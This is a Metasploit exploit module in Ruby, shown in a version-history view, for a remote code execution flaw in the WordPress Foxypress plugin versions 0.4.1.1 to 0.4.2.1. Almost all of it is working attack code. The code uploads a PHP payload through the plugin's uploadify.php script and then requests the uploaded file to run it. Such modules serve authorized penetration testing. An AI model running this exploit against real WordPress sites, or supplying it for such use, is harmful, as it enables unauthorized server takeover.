metasploit-framework/modules/exploits/unix/webapp/php_wordpress_foxypress.rb

86 lines
2.7 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
2013-08-30 21:28:54 +00:00
Rank = ExcellentRanking
2014-07-28 20:23:22 +00:00
include Msf::HTTP::Wordpress
include Msf::Exploit::FileDropper
2013-08-30 21:28:54 +00:00
def initialize(info = {})
2014-07-28 20:23:22 +00:00
super(update_info(
info,
2013-11-15 06:03:42 +00:00
'Name' => 'WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution',
2014-07-28 20:23:22 +00:00
'Description' => %q(
2013-08-30 21:28:54 +00:00
This module exploits an arbitrary PHP code execution flaw in the WordPress
blogging software plugin known as Foxypress. The vulnerability allows for arbitrary
file upload and remote code execution via the uploadify.php script. The Foxypress
2014-07-28 20:45:04 +00:00
plug-in versions 0.4.1.1 to 0.4.2.1 are vulnerable.
2014-07-28 20:23:22 +00:00
),
2013-08-30 21:28:54 +00:00
'Author' =>
[
'Sammy FORGIT', # Vulnerability Discovery, PoC
'patrick' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
2014-07-30 15:24:14 +00:00
['EDB', '18991'],
['OSVDB' '82652'],
2014-10-02 21:03:31 +00:00
['BID', '53805'],
2014-10-03 15:13:18 +00:00
['WPVDB', '6231']
2013-08-30 21:28:54 +00:00
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
2014-07-28 20:45:04 +00:00
'Targets' => [['Foxypress 0.4.1.1 - 0.4.2.1', {}]],
2013-08-30 21:28:54 +00:00
'DisclosureDate' => 'Jun 05 2012',
'DefaultTarget' => 0))
end
def check
2014-07-28 20:23:22 +00:00
res = send_request_cgi(
2013-08-30 21:28:54 +00:00
'method' => 'GET',
2014-07-28 20:23:22 +00:00
'uri' => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php')
)
2013-08-30 21:28:54 +00:00
2014-07-28 20:23:22 +00:00
return Exploit::CheckCode::Detected if res && res.code == 200
Exploit::CheckCode::Safe
2013-08-30 21:28:54 +00:00
end
def exploit
post_data = Rex::MIME::Message.new
2014-07-28 20:23:22 +00:00
post_data.add_part("<?php #{payload.encoded} ?>", 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"")
2013-08-30 21:28:54 +00:00
print_status("#{peer} - Sending PHP payload")
2014-07-28 20:23:22 +00:00
res = send_request_cgi(
2013-08-30 21:28:54 +00:00
'method' => 'POST',
2014-07-28 20:23:22 +00:00
'uri' => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php'),
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
2013-08-30 21:28:54 +00:00
'data' => post_data.to_s
2014-07-28 20:23:22 +00:00
)
2013-08-30 21:28:54 +00:00
2014-07-28 20:23:22 +00:00
if res.nil? || res.code != 200 || res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/
2013-08-30 21:28:54 +00:00
print_error("#{peer} - File wasn't uploaded, aborting!")
return
end
2014-07-28 20:23:22 +00:00
filename = "#{Regexp.last_match[1]}.php"
2013-08-30 21:28:54 +00:00
2014-07-28 20:23:22 +00:00
print_good("#{peer} - Our payload is at: #{filename}. Calling payload...")
register_files_for_cleanup(filename)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(wordpress_url_wp_content, 'affiliate_images', filename)
)
2013-08-30 21:28:54 +00:00
2014-07-28 20:23:22 +00:00
print_error("#{peer} - Server returned #{res.code}") if res && res.code != 200
2013-08-30 21:28:54 +00:00
end
end